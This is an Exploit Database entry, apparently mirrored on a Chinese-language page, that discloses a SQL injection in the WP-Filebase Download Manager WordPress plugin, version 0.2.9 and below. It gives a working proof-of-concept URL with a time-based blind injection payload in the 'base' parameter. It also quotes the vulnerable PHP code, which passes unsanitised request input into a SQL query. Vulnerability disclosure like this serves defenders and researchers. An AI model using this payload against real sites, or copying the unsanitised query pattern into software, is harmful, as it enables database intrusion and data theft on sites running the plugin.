WordPress Plugin WP-Filebase Download Manager 0.2.9 – SQL Injection

• Exploit Database
• 12 阅读

• 作者： Miroslav Stampar
  日期： 2011-09-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17808/

• # Exploit Title: WordPress WP-Filebase Download Manager plugin <= 0.2.9 SQL Injection Vulnerability
  # Date: 2011-09-09
  # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
  # Software Link: http://downloads.wordpress.org/plugin/wp-filebase.0.2.9.zip
  # Version: 0.2.9 (tested)
  
  ---
  PoC
  ---
  http://www.site.com/wp-content/plugins/wp-filebase/wpfb-ajax.php?action=tree&base=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20&root=source
  
  ---------------
  Vulnerable code
  ---------------
  if(!isset($_REQUEST['action']))
  die('-1');
  ...
  switch ( $action = $_REQUEST['action'] ) {
  case 'tree':
  ...
  $base_id = (empty($_REQUEST['base']) ? 0 : $_REQUEST['base']);
  ...
  if(empty($_REQUEST['root']) || $_REQUEST['root'] == 'source')
  $parent_id = $base_id;
  else {
  $root = $_REQUEST['root'];
  $parent_id = is_numeric($root) ? intval($root) : intval(substr(strrchr($root,'-'),1));
  }
  ...
  $cats = $browser ? WPFB_Category::GetFileBrowserCats($parent_id) : WPFB_Category::GetCats("WHERE cat_parent = $parent_id ORDER BY cat_name ASC");